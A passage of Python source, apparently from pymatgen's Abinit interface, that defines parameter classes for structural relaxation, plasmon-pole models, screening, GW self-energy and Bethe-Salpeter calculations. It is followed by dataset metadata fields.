"atoms_constraints": {}, # Constraints are stored in a dictionary. {} means if no constraint is enforced.
}
IONMOV_DEFAULT = 3
OPTCELL_DEFAULT = 2
def __init__(self, *args, **kwargs):
# Initialize abivars with the default values.
self.abivars = self._default_vars
# Overwrite the keys with the args and kwargs passed to constructor.
self.abivars.update(*args, **kwargs)
self.abivars = AttrDict(self.abivars)
for k in self.abivars:
if k not in self._default_vars:
raise ValueError("%s: No default value has been provided for key %s" % (self.__class__.__name__, k))
for k in self.abivars:
if k is MANDATORY:
raise ValueError("%s: No default value has been provided for the mandatory key %s" %
(self.__class__.__name__, k))
@classmethod
def atoms_only(cls, atoms_constraints=None):
if atoms_constraints is None:
return cls(ionmov=cls.IONMOV_DEFAULT, optcell=0)
else:
return cls(ionmov=cls.IONMOV_DEFAULT, optcell=0, atoms_constraints=atoms_constraints)
@classmethod
def atoms_and_cell(cls, atoms_constraints=None):
if atoms_constraints is None:
return cls(ionmov=cls.IONMOV_DEFAULT, optcell=cls.OPTCELL_DEFAULT)
else:
return cls(ionmov=cls.IOMOV_DEFAULT, optcell=cls.OPTCELL_DEFAULT, atoms_constraints=atoms_constraints)
@property
def move_atoms(self):
"""True if atoms must be moved."""
return self.abivars.ionmov != 0
@property
def move_cell(self):
"""True if lattice parameters must be optimized."""
return self.abivars.optcell != 0
def to_abivars(self):
"""Returns a dictionary with the abinit variables"""
# These variables are always present.
out_vars = {
"ionmov" : self.abivars.ionmov,
"optcell": self.abivars.optcell,
"ntime" : self.abivars.ntime,
}
# Atom relaxation.
if self.move_atoms:
out_vars.update({
"tolmxf": self.abivars.tolmxf,
})
if self.abivars.atoms_constraints:
# Add input variables for constrained relaxation.
raise NotImplementedError("")
out_vars.update(self.abivars.atoms_constraints.to_abivars())
# Cell relaxation.
if self.move_cell:
out_vars.update({
"dilatmx" : self.abivars.dilatmx,
"ecutsm" : self.abivars.ecutsm,
"strfact" : self.abivars.strfact,
"strtarget": self.abivars.strtarget,
})
return out_vars
def as_dict(self):
d = dict(self._default_vars)
d['@module'] = self.__class__.__module__
d['@class'] = self.__class__.__name__
return d
@classmethod
def from_dict(cls, d):
d = d.copy()
d.pop('@module', None)
d.pop('@class', None)
return cls(**d)
class PPModel(AbivarAble, PMGSONable):
"""
Parameters defining the plasmon-pole technique.
The common way to instanciate a PPModel object is via the class method PPModel.as_ppmodel(string)
"""
_mode2ppmodel = {
"noppmodel": 0,
"godby" : 1,
"hybersten": 2,
"linden" : 3,
"farid" : 4,
}
modes = Enum(k for k in _mode2ppmodel)
@classmethod
def as_ppmodel(cls, obj):
"""
Constructs an instance of PPModel from obj.
Accepts obj in the form:
* PPmodel instance
* string. e.g "godby:12.3 eV", "linden".
"""
if isinstance(obj, cls):
return obj
# obj is a string
if ":" not in obj:
mode, plasmon_freq = obj, None
else:
# Extract mode and plasmon_freq
mode, plasmon_freq = obj.split(":")
try:
plasmon_freq = float(plasmon_freq)
except ValueError:
plasmon_freq, unit = plasmon_freq.split()
plasmon_freq = units.Energy(float(plasmon_freq), unit).to("Ha")
return cls(mode=mode, plasmon_freq=plasmon_freq)
def __init__(self, mode="godby", plasmon_freq=None):
assert mode in PPModel.modes
self.mode = mode
self.plasmon_freq = plasmon_freq
def __eq__(self, other):
if other is None:
return False
else:
if self.mode != other.mode:
return False
if self.plasmon_freq is None:
return other.plasmon_freq is None
else:
return np.allclose(self.plasmon_freq, other.plasmon_freq)
def __ne__(self, other):
return not self == other
def __bool__(self):
return self.mode != "noppmodel"
# py2 old version
__nonzero__ = __bool__
def __repr__(self):
return "<%s at %s, mode = %s>" % (self.__class__.__name__, id(self),
str(self.mode))
def to_abivars(self):
if self:
return {"ppmodel": self._mode2ppmodel[self.mode], "ppmfrq": self.plasmon_freq}
else:
return {}
@classmethod
def noppmodel(cls):
return cls(mode="noppmodel", plasmon_freq=None)
def as_dict(self):
return {"mode": self.mode, "plasmon_freq": self.plasmon_freq,
"@module": self.__class__.__module__,
"@class": self.__class__.__name__}
@staticmethod
def from_dict(d):
return PPModel(mode=d["mode"], plasmon_freq=d["plasmon_freq"])
class HilbertTransform(AbivarAble):
"""
Parameters for the Hilbert-transform method (Screening code)
i.e. the parameters defining the frequency mesh used for the spectral function
and the frequency mesh used for the polarizability
"""
def __init__(self, nomegasf, domegasf=None, spmeth=1, nfreqre=None, freqremax=None, nfreqim=None, freqremin=None):
"""
Args:
nomegasf: Number of points for sampling the spectral function along the real axis.
domegasf: Step in Ha for the linear mesh used for the spectral function.
spmeth: Algorith for the representation of the delta function.
nfreqre: Number of points along the real axis (linear mesh).
freqremax: Maximum frequency for W along the real axis (in hartree).
nfreqim: Number of point along the imaginary axis (Gauss-Legendre mesh).
freqremin: Minimum frequency for W along the real axis (in hartree).
"""
# Spectral function
self.nomegasf = nomegasf
self.domegasf = domegasf
self.spmeth = spmeth
# Mesh for the contour-deformation method used for the integration of the self-energy
self.nfreqre = nfreqre
self.freqremax = freqremax
self.freqremin = freqremin
self.nfreqim = nfreqim
def to_abivars(self):
"""Returns a dictionary with the abinit variables"""
return {
# Spectral function
"nomegasf": self.nomegasf,
"domegasf": self.domegasf,
"spmeth" : self.spmeth,
# Frequency mesh for the polarizability
"nfreqre" : self.nfreqre,
"freqremax": self.freqremax,
"nfreqim" : self.nfreqim,
"freqremin": self.freqremin,
}
class ModelDielectricFunction(AbivarAble):
"""Model dielectric function used for BSE calculation"""
def __init__(self, mdf_epsinf):
self.mdf_epsinf = mdf_epsinf
def to_abivars(self):
return {"mdf_epsinf": self.mdf_epsinf}
##########################################################################################
################################# WORK IN PROGRESS ######################################
##########################################################################################
class Screening(AbivarAble):
"""
This object defines the parameters used for the
computation of the screening function.
"""
# Approximations used for W
_WTYPES = {
"RPA": 0,
}
# Self-consistecy modes
_SC_MODES = {
"one_shot" : 0,
"energy_only" : 1,
"wavefunctions": 2,
}
def __init__(self, ecuteps, nband, w_type="RPA", sc_mode="one_shot",
hilbert=None, ecutwfn=None, inclvkb=2):
"""
Args:
ecuteps: Cutoff energy for the screening (Ha units).
nband Number of bands for the Green's function
w_type: Screening type
sc_mode: Self-consistency mode.
hilbert: Instance of :class:`HilbertTransform` defining the parameters for the Hilber transform method.
ecutwfn: Cutoff energy for the wavefunctions (Default: ecutwfn == ecut).
inclvkb: Option for the treatment of the dipole matrix elements (NC pseudos).
"""
if w_type not in self._WTYPES:
raise ValueError("W_TYPE: %s is not supported" % w_type)
if sc_mode not in self._SC_MODES:
raise ValueError("Self-consistecy mode %s is not supported" % sc_mode)
self.ecuteps = ecuteps
self.nband = nband
self.w_type = w_type
self.sc_mode = sc_mode
self.ecutwfn = ecutwfn
self.inclvkb = inclvkb
if hilbert is not None:
raise NotImplementedError("Hilber transform not coded yet")
self.hilbert = hilbert
# Default values
# TODO Change abinit defaults
self.gwpara=2
self.awtr =1
self.symchi=1
self.optdriver = 3
@property
def use_hilbert(self):
return hasattr(self, "hilbert")
#@property
#def gwcalctyp(self):
# "Return the value of the gwcalctyp input variable"
# dig0 = str(self._SIGMA_TYPES[self.type])
# dig1 = str(self._SC_MODES[self.sc_mode]
# return dig1.strip() + dig0.strip()
def to_abivars(self):
"""Returns a dictionary with the abinit variables"""
abivars = {
"ecuteps" : self.ecuteps,
"ecutwfn" : self.ecutwfn,
"inclvkb" : self.inclvkb,
"gwpara" : self.gwpara,
"awtr" : self.awtr,
"symchi" : self.symchi,
#"gwcalctyp": self.gwcalctyp,
#"fftgw" : self.fftgw,
"optdriver" : self.optdriver,
}
# Variables for the Hilber transform.
if self.use_hilbert:
abivars.update(self.hilbert.to_abivars())
return abivars
class SelfEnergy(AbivarAble):
"""
This object defines the parameters used for the computation of the self-energy.
"""
_SIGMA_TYPES = {
"gw" : 0,
"hartree_fock": 5,
"sex" : 6,
"cohsex" : 7,
"model_gw_ppm": 8,
"model_gw_cd" : 9,
}
_SC_MODES = {
"one_shot" : 0,
"energy_only" : 1,
"wavefunctions": 2,
}
def __init__(self, se_type, sc_mode, nband, ecutsigx, screening,
gw_qprange=1, ppmodel=None, ecuteps=None, ecutwfn=None, gwpara=2):
"""
Args:
se_type: Type of self-energy (str)
sc_mode: Self-consistency mode.
nband: Number of bands for the Green's function
ecutsigx: Cutoff energy for the exchange part of the self-energy (Ha units).
screening: :class:`Screening` instance.
gw_qprange: Option for the automatic selection of k-points and bands for GW corrections.
See Abinit docs for more detail. The default value makes the code computie the
QP energies for all the point in the IBZ and one band above and one band below the Fermi level.
ppmodel: :class:`PPModel` instance with the parameters used for the plasmon-pole technique.
ecuteps: Cutoff energy for the screening (Ha units).
ecutwfn: Cutoff energy for the wavefunctions (Default: ecutwfn == ecut).
"""
if se_type not in self._SIGMA_TYPES:
raise ValueError("SIGMA_TYPE: %s is not supported" % se_type)
if sc_mode not in self._SC_MODES:
raise ValueError("Self-consistecy mode %s is not supported" % sc_mode)
self.type = se_type
self.sc_mode = sc_mode
self.nband = nband
self.ecutsigx = ecutsigx
self.screening = screening
self.gw_qprange = gw_qprange
self.gwpara = gwpara
if ppmodel is not None:
assert not screening.use_hilbert
self.ppmodel = PPModel.as_ppmodel(ppmodel)
self.ecuteps = ecuteps if ecuteps is not None else screening.ecuteps
self.ecutwfn = ecutwfn
self.optdriver = 4
#band_mode in ["gap", "full"]
#if isinstance(kptgw, str) and kptgw == "all":
# self.kptgw = None
# self.nkptgw = None
#else:
# self.kptgw = np.reshape(kptgw, (-1,3))
# self.nkptgw = len(self.kptgw)
#if bdgw is None:
# raise ValueError("bdgw must be specified")
#if isinstance(bdgw, str):
# # TODO add new variable in Abinit so that we can specify
# # an energy interval around the KS gap.
# homo = float(nele) / 2.0
# #self.bdgw =
#else:
# self.bdgw = np.reshape(bdgw, (-1,2))
#self.freq_int = freq_int
@property
def use_ppmodel(self):
"""True if we are using the plasmon-pole approximation."""
return hasattr(self, "ppmodel")
@property
def gwcalctyp(self):
"""Returns the value of the gwcalctyp input variable."""
dig0 = str(self._SIGMA_TYPES[self.type])
dig1 = str(self._SC_MODES[self.sc_mode])
return dig1.strip() + dig0.strip()
@property
def symsigma(self):
"""1 if symmetries can be used to reduce the number of q-points."""
return 1 if self.sc_mode == "one_shot" else 0
def to_abivars(self):
"""Returns a dictionary with the abinit variables."""
abivars = dict(
gwcalctyp=self.gwcalctyp,
ecuteps=self.ecuteps,
ecutsigx=self.ecutsigx,
symsigma=self.symsigma,
gw_qprange=self.gw_qprange,
gwpara=self.gwpara,
optdriver=self.optdriver,
#"ecutwfn" : self.ecutwfn,
#"kptgw" : self.kptgw,
#"nkptgw" : self.nkptgw,
#"bdgw" : self.bdgw,
)
# FIXME: problem with the spin
#assert len(self.bdgw) == self.nkptgw
# ppmodel variables
if self.use_ppmodel:
abivars.update(self.ppmodel.to_abivars())
return abivars
class ExcHamiltonian(AbivarAble):
"""This object contains the parameters for the solution of the Bethe-Salpeter equation."""
# Types of excitonic Hamiltonian.
_EXC_TYPES = {
"TDA": 0, # Tamm-Dancoff approximation.
"coupling": 1, # Calculation with coupling.
}
# Algorithms used to compute the macroscopic dielectric function
# and/or the exciton wavefunctions.
_ALGO2VAR = {
"direct_diago": 1,
"haydock" : 2,
"cg" : 3,
}
# Options specifying the treatment of the Coulomb term.
_COULOMB_MODES = [
"diago",
"full",
"model_df"
]
def __init__(self, bs_loband, nband, soenergy, coulomb_mode, ecuteps, spin_mode="polarized", mdf_epsinf=None,
exc_type="TDA", algo="haydock", with_lf=True, bs_freq_mesh=None, zcut=None, **kwargs):
"""
Args:
bs_loband: Lowest band index (Fortran convention) used in the e-h basis set.
Can be scalar or array of shape (nsppol,). Must be >= 1 and <= nband
nband: Max band index used in the e-h basis set.
soenergy: Scissors energy in Hartree.
coulomb_mode: Treatment of the Coulomb term.
ecuteps: Cutoff energy for W in Hartree.
mdf_epsinf: Macroscopic dielectric function :math:`\epsilon_\inf` used in
the model dielectric function.
exc_type: Approximation used for the BSE Hamiltonian
with_lf: True if local field effects are included <==> exchange term is included
bs_freq_mesh: Frequency mesh for the macroscopic dielectric function (start, stop, step) in Ha.
zcut: Broadening parameter in Ha.
**kwargs:
Extra keywords
"""
spin_mode = SpinMode.as_spinmode(spin_mode)
# We want an array bs_loband(nsppol).
try:
bs_loband = np.reshape(bs_loband, spin_mode.nsppol)
except ValueError:
bs_loband = np.array(spin_mode.nsppol * [int(bs_loband)])
self.bs_loband = bs_loband
self.nband = nband
self.soenergy = soenergy
self.coulomb_mode = coulomb_mode
assert coulomb_mode in self._COULOMB_MODES
self.ecuteps = ecuteps
self.mdf_epsinf = mdf_epsinf
self.exc_type = exc_type
assert exc_type in self._EXC_TYPES
self.algo = algo
assert algo in self._ALGO2VAR
self.with_lf = with_lf
# if bs_freq_mesh is not given, abinit will select its own mesh.
self.bs_freq_mesh = np.array(bs_freq_mesh) if bs_freq_mesh is not None else bs_freq_mesh
self.zcut = zcut
self.optdriver = 99
# Extra options.
self.kwargs = kwargs
#if "chksymbreak" not in self.kwargs:
# self.kwargs["chksymbreak"] = 0
# Consistency check
if any(bs_loband < 0):
raise ValueError("bs_loband <= 0 while it is %s" % bs_loband)
if any(bs_loband >= nband):
raise ValueError("bs_loband (%s) >= nband (%s)" % (bs_loband, nband))
@property
def inclvkb(self):
"""Treatment of the dipole matrix element (NC pseudos, default is 2)"""
return self.kwargs.get("inclvkb", 2)
@property
def use_haydock(self):
"""True if we are using the Haydock iterative technique."""
return self.algo == "haydock"
@property
def use_cg(self):
"""True if we are using the conjugate gradient method."""
return self.algo == "cg"
@property
def use_direct_diago(self):
"""True if we are performing the direct diagonalization of the BSE Hamiltonian."""
return self.algo == "direct_diago"
def to_abivars(self):
"""Returns a dictionary with the abinit variables."""
abivars = dict(
bs_calctype=1,
bs_loband=self.bs_loband,
#nband=self.nband,
soenergy=self.soenergy,
ecuteps=self.ecuteps,
bs_algorithm = self._ALGO2VAR[self.algo],
bs_coulomb_term=21,
mdf_epsinf=self.mdf_epsinf,
bs_exchange_term=1 if self.with_lf else 0,
inclvkb=self.inclvkb,
zcut=self.zcut,
bs_freq_mesh=self.bs_freq_mesh,
bs_coupling=self._EXC_TYPES[self.exc_type],
optdriver=self.optdriver,
)
if self.use_haydock:
# FIXME
abivars.update(
bs_haydock_niter=100, # No. of iterations for Haydock
bs_hayd_term=0, # No terminator
bs_haydock_tol=[0.05, 0], # Stopping criteria
)
elif self.use_direct_diago:
raise NotImplementedError("")
elif self.use_cg:
raise NotImplementedError("")
else:
raise ValueError("Unknown algorithm for EXC: %s" % self.algo)
# Add extra kwargs
abivars.update(self.kwargs)
return abivars
|
mit
| -4,362,257,695,082,234,400
| 32.958003
| 118
| 0.570389
| false
| 3.623489
| false
| false
| false
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.